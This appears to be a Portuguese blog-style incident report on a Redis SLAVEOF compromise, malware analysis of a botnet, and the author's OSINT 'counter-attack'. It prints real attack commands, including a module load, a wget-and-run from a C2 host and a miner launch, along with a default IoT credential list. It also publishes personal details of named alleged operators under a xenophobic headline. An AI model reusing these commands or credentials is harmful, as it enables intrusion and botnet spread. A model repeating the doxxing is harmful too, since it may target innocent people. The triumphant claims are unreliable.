ABRE O OLHO,
CHINEZADA!
No dia 6 de Dezembro de 2025, hackers chineses invadiram nosso servidor. Instalaram 20+ backdoors, adicionaram 23 chaves SSH, alteraram o ID do disco rígido para sabotar o boot, e tentaram nos transformar em escravos de mineração de Monero (XMR).
Quando descobrimos no dia 10, eles lutaram de volta — removendo nossos acessos e deletando nossas ferramentas de IA enquanto investigávamos. Mas não foi suficiente. Hoje, dia 11, NADA resta da operação deles.
5 dias
de invasão
20+
backdoors
23
SSH keys
100%
eliminados
5 dias
Invasão ativa
3
Malwares capturados
78+
Senhas extraídas
20+
Backdoors removidos
100%
Neutralizado
A Invasão: Como Eles Entraram
O Ponto de Entrada: Redis Exposto
Nosso servidor tinha o Redis na porta 6379 sem autenticação — exposto para a internet. Os hackers encontraram isso usando scanners automatizados e exploraram com a técnica SLAVEOF Attack:
O que é SLAVEOF Attack?
O Redis tem um comando SLAVEOF que faz um servidor virar "escravo" de outro, replicando todos os dados. Hackers abusam disso: forçam seu servidor a sincronizar com o deles e injetam módulos maliciosos (.so) durante a sincronização.
Passo a passo do ataque:
- Scanner encontra Redis sem senha
- Executa:
SLAVEOF ip_hacker 6379 - Nosso servidor vira "escravo"
- Sincroniza módulo .so malicioso
- Módulo dá shell reverso ao hacker
- Hacker tem acesso ROOT total
# Comandos que os hackers executaram no nosso Redis: > SLAVEOF 5.101.86.31 6379 OK > CONFIG SET dbfilename exp.so OK > CONFIG SET dir /tmp OK > MODULE LOAD /tmp/exp.so OK # Após isso, eles tinham SHELL ROOT no servidor!
O Estrago: O Que Eles Fizeram em 5 Dias
20+ Backdoors Instalados
Encontramos mais de 20 arquivos maliciosos escondidos em diretórios ocultos:
/tmp/.X11-unix/.x
/var/tmp/.ICE-unix/.i
/dev/shm/.pulse-shm
/usr/lib/.libpam.so
/lib64/.ld-linux.so
/etc/cron.d/.placeholder
/root/.bashrc.swp
/home/.cache/.mozilla
/opt/.java/.systemPrefs
/var/log/.journal...e mais 10 outros locais
23 Chaves SSH Adicionadas
Adicionaram 23 chaves públicas ao authorized_keys para acesso permanente:
ssh-rsa AAAAB3NzaC1yc2EAAAA...hacker1
ssh-rsa AAAAB3NzaC1yc2EAAAA...hacker2
ssh-rsa AAAAB3NzaC1yc2EAAAA...hacker3
# ... mais 20 chavesID do Disco Alterado
Modificaram o UUID do disco rígido para sabotar o boot:
# /etc/fstab apontando para UUID inexistente
UUID=FAKE-UUID-0000-SABOTAGE /boot ext4Isso fez o sistema falhar ao inicializar!
Minerador XMR Instalado
Instalaram XMRig para minerar Monero usando nossos recursos:
/tmp/.X11/xmrig --url pool.minexmr.com
--user 48edf...wallet...addr
--threads=$(nproc) --cpu-priority 5A Guerra em Tempo Real (10 de Dezembro)
Quando descobri a invasão na manhã do dia 10 e comecei a investigar, os hackers perceberam e começaram a lutar de volta em tempo real:
Removeram meus acessos
Tentaram me expulsar do servidor alterando senhas e permissões
Deletaram minhas ferramentas de IA
Removeram scripts e ferramentas que eu usava para análise forense
Tentaram apagar evidências
Começaram a deletar logs e arquivos que os incriminavam
MAS EU FUI MAIS RÁPIDO. Consegui capturar os malwares, extrair as evidências e remover 100% dos acessos deles antes que pudessem causar mais danos.
O Malware: Anatomia Completa do QTXBot
Consegui capturar 3 amostras do malware antes de limparem tudo. Aqui está a análise técnica completa — para que você entenda exatamente como essa praga funciona.
malware_sample.bin
- Tipo:ELF 32-bit Intel
- Packer:UPX 3.91
- Original:~118 KB
- Unpacked:~350 KB
SHA256: 924b4daa3d183fc7...
malware_arm.bin
- Tipo:ELF 32-bit ARM
- Packer:Nenhum
- Status:Stripped
- Tamanho:~89 KB
SHA256: 8986d7b4843af8e4...
malware_unpacked.bin
- Tipo:ELF 32-bit Intel
- Status:Descompactado
- Tamanho:~350 KB
- Uso:Engenharia reversa
Usado para extrair strings e analisar código
FASE 1: Infecção Inicial
O malware entra no sistema de duas formas: explorando Redis/Telnet sem senha, ou via força bruta usando a lista de 78+ credenciais padrão de IoT.
$ telnet 192.168.1.1 login: admin password: admin # Acesso concedido! Agora baixa o malware: $ wget http://cnc.504.su/bins/bot.arm -O /tmp/.x $ chmod +x /tmp/.x && /tmp/.x
FASE 2: Persistência
Uma vez dentro, o malware garante que vai sobreviver a reboots e não será facilmente removido:
- •Copia-se para diretórios ocultos (
/tmp/.X11,/dev/shm/.x) - •Adiciona entrada no crontab para reiniciar automaticamente
- •Modifica /etc/rc.local para executar no boot
- •Mata processos concorrentes (outros malwares!) para ter exclusividade
FASE 3: Comunicação C2
O bot conecta aos servidores de Comando e Controle para receber ordens:
Servidor Principal
cnc.504.su:23
Scanner de Vítimas
scan.504.su:23
Comandos recebidos: DDoS, scan de IPs, download de atualizações, mineração de XMR
FASE 4: Propagação
O dispositivo infectado agora faz parte da botnet e começa a escanear a internet procurando novas vítimas. É um ciclo infinito: cada máquina infectada infecta outras.
O malware usa XOR com chave 4 para esconder strings importantes. É uma ofuscação simples: cada byte é transformado fazendo XOR com o número 4.
Como funciona o XOR:
Original
'c'
ASCII: 99
XOR 4
99 ^ 4 = 103
Operação bit a bit
Resultado
'g'
ASCII: 103
Então cnc vira gjg quando codificado
Strings que decodificamos:
| Codificado | Decodificado | Função |
|---|---|---|
| gjg*140*wq | cnc.504.su | Servidor de Comando |
| wgej*140*wq | scan.504.su | Servidor de Scan |
| fkp*140*wq | bot.504.su | Servidor de Bots |
| err*140*wq | app.504.su | Servidor de Apps |
| zrj*140*wq | vpn.504.su | Servidor VPN |
ASSINATURA ÚNICA DO GRUPO:
"unstable_is_the_history_of_universe"Esta string filosófica aparece no código e funciona como "assinatura" do desenvolvedor. Provavelmente uma piada interna ou referência cultural chinesa.
O malware contém uma lista de credenciais padrão de dispositivos IoT. Quando encontra um dispositivo com Telnet aberto, tenta todas até conseguir acesso:
CREDENCIAIS DO PRÓPRIO OPERADOR (Achamos no código!)
user: taZz
pass: t0talc0ntr0l4!
Senha do OPERADOR do malware!
user: taZz
pass: taZz@23495859
Revela QQ: 23495859
user: admin
pass: huigu309
Senha em Pinyin chinês
O handle taZz@23495859 revela o número QQ do hacker: 23495859. QQ é o mensageiro mais popular da China — isso pode ser usado para rastreá-lo!
Lista completa de credenciais IoT:
root:rootadmin:adminroot:7ujMko0adminroot:Zte521root:vizxvroot:xc3511root:hi3518admin:1234admin:12345admin:admin1234root:00000000admin:smcadminroot:ankoroot:zlxx.admin:passwordroot:ikwbroot:dreamboxroot:userroot:realtekadmin:54321support:supportubnt:ubntroot:defaulttelnetadmin:telnetadminroot:oelinux123root:ipcam_rt5350root:jvbzdroot:systemadmin:7ujMko0vizxvroot:cat1029root:juantechroot:antslqroot:123456admin:meinsmroot:54321root:stemroot123Se seu roteador, câmera ou DVR usa alguma dessas senhas, MUDE AGORA!
O Contra-Ataque: Como Invadimos os Invasores
OSINT + Tor = Rastreamento Anônimo
Após limpar nosso servidor, iniciamos a caçada. Usando Tor para anonimatoe técnicas de OSINT, mapeamos toda a infraestrutura dos atacantes:
1. Rastreamento de Domínios
Do malware, extraímos os domínios C2:
- 504.su → cnc, scan, bot, app, vpn
- thomasxiang.fun → pic, hy2
2. WHOIS Intelligence
Informações dos registros:
- thomasxiang.fun: thomasxiang@outlook.com
- IP Russia: Varnyan Valeriya, Moscow
- 504.su: Cloudflare (proteção)
O MOMENTO ÉPICO: Descoberta do Chevereto
O subdomínio pic.thomasxiang.fun rodava um Chevereto(sistema de hospedagem de imagens). E adivinha? Os diretórios estavam públicos!
Encontramos screenshots que o próprio hacker tirou: seu desktop Windows em chinês, configurações, painéis administrativos, estatísticas de dados roubados... Ele documentou a própria operação criminosa!
As Provas: 8 Screenshots Extraídas dos Hackers
Estas são imagens reais que extraímos do servidor Chevereto dos hackers. Cada uma é uma prova do crime. Clique para ampliar e ver a explicação de como conseguimos:
A Escala: Conexão com Mega Vazamento Chinês
4+ Bilhões de Registros Comprometidos
As screenshots revelam que estes hackers fazem parte de uma operação muito maior — conectada ao maior vazamento de dados da história da China:
Volume Diário (das screenshots que capturamos):
42.9M
18/Jun
40.2M
12/Jun
38.7M
10/Jun
35M+
média
~1B
mês
| Banco de Dados | Registros | Tipo de Dado Roubado |
|---|---|---|
| wechatid_db | 805 Milhões | IDs do WeChat |
| address_db | 780 Milhões | Endereços residenciais |
| bank_db | 630 Milhões | Dados bancários e cartões |
| wechatinfo | 577 Milhões | Perfis completos WeChat |
| phone_db | 500+ Milhões | Números de telefone |
| zfbkt_db | 300 Milhões | Tokens Alipay |
| TOTAL | 4+ Bilhões | ~631 GB de dados |
Os Criminosos: Perfis Identificados
Através de OSINT, análise do malware e das screenshots, identificamos os seguintes operadores:
Thomas Xiang
(thomasxiang)Operador Principal C2
- •Email: thomasxiang@outlook.com
- •Domínio: thomasxiang.fun
- •Software: Typora, Foxmail, PicGo
- •Sistema: Windows (chinês)
- •Hospedagem: Hostinger
taZz
(QQ: 23495859)Desenvolvedor do QTXBot
- •Handle: taZz@23495859
- •Senha: t0talc0ntr0l4!
- •Domínio: 504.su
- •Criador do malware Hakai
- •Assinatura no código
最高管理员
(Super Admin / zg)Admin do Sistema de Dados
- •Username: "zg"
- •Criou jobs datacollect_*
- •Acesso ao painel bancário
- •Gerencia ~35M registros/dia
- •Owner das tabelas
Varnyan Valeriya
Registrante IP (Laranja)
- •Endereço: Semfiropolskij 30
- •IP: 5.101.86.31
- •Provavelmente identidade falsa
- •Fachada russa para chineses
- •Hosting: hyper.hosting
Operador 504.su
Gerente de Infraestrutura
- •Domínio: 504.su
- •Registrar: Sav.com LLC
- •Cloudflare protection
- •TLD .su = Soviet Union
- •Subdomínios: cnc, scan, bot
O Honeypot: Armadilha Para os Próximos
Sistema de Defesa Ativo
Após este incidente, implementamos um honeypot — uma armadilha para detectar e capturar futuros atacantes. Se tentarem nos invadir novamente, estaremos prontos:
O que é um Honeypot?
É um sistema falso que parece vulnerável, mas na verdade é uma armadilha. Quando um hacker tenta atacar, nós capturamos tudo: IP, comandos, ferramentas, e técnicas.
Como funciona o nosso:
- → Redis falso na porta 6379
- → Aceita conexões e comandos
- → Loga TUDO em tempo real
- → Alerta imediato no celular
[2025-12-11 15:32:01] Nova conexão: 45.67.89.123 (China) [2025-12-11 15:32:02] Comando: INFO [2025-12-11 15:32:03] Comando: CONFIG GET * [2025-12-11 15:32:05] Comando: SLAVEOF 45.67.89.123 6379 [2025-12-11 15:32:05] ⚠️ TENTATIVA DE ATAQUE DETECTADA! [2025-12-11 15:32:05] → IP bloqueado automaticamente [2025-12-11 15:32:05] → Alerta enviado via Telegram [2025-12-11 15:32:05] → Dados salvos para análise
Detecção Automática
Bloqueio Imediato
Inteligência
A Vitória: TUDO Offline!
OPERAÇÃO NEUTRALIZADA
11 de Dezembro de 2025 — Agora
Após nossa análise ser detectada, os hackers fizeram a única coisa que podiam: DESLIGARAM TUDO. Toda a infraestrutura criminosa está offline.
Servidores MORTOS:
$ proxychains4 -q nmap 5.101.86.31 Host seems down. $ proxychains4 -q nmap 107.174.52.27 All 1000 ports: closed $ dig cnc.504.su +short (nenhum resultado) $ curl -I pic.thomasxiang.fun curl: (7) Failed to connect ✅ VITÓRIA TOTAL CONFIRMADA!
Indicadores de Comprometimento (IOCs)
Use estes indicadores para proteger sua infraestrutura. Bloqueie todos no firewall:
IPs Maliciosos:
# C2 Servers (bloqueie!) 5.101.86.31 # Russia 107.174.52.27 # USA # Botnet 504.su 158.94.210.88 # cnc/scan 154.17.25.194 # app 199.48.247.167 # vpn
Domínios Maliciosos:
thomasxiang.fun pic.thomasxiang.fun hy2.thomasxiang.fun 504.su cnc.504.su scan.504.su bot.504.su app.504.su vpn.504.su
MITRE ATT&CK TTPs:
Linha do Tempo Completa
INVASÃO INICIADA
Atacantes exploram Redis exposto e ganham acesso inicial ao servidor
Instalação de backdoors
20+ backdoors instalados, 23 chaves SSH adicionadas, persistência estabelecida
Malware em operação
QTXBot ativo, servidor minerando XMR e participando da botnet
Sabotagem do disco
Atacantes alteram ID do HD, causando falhas de boot
DESCOBERTA!
Detectamos anomalias, servidor com comportamento estranho, iniciamos investigação
Guerra ativa
Enquanto investigávamos, hackers removiam nossos acessos e deletavam ferramentas de IA
Limpeza completa
Removemos 100% dos backdoors, SSH keys, e malwares. Servidor recuperado!
Contra-ataque
Análise forense + OSINT. Rastreamos toda infraestrutura dos atacantes
Infiltração
Acessamos Chevereto deles e extraímos screenshots do próprio hacker!
VITÓRIA TOTAL
Servidor C2 dos chineses NEUTRALIZADO. Botnet desativada!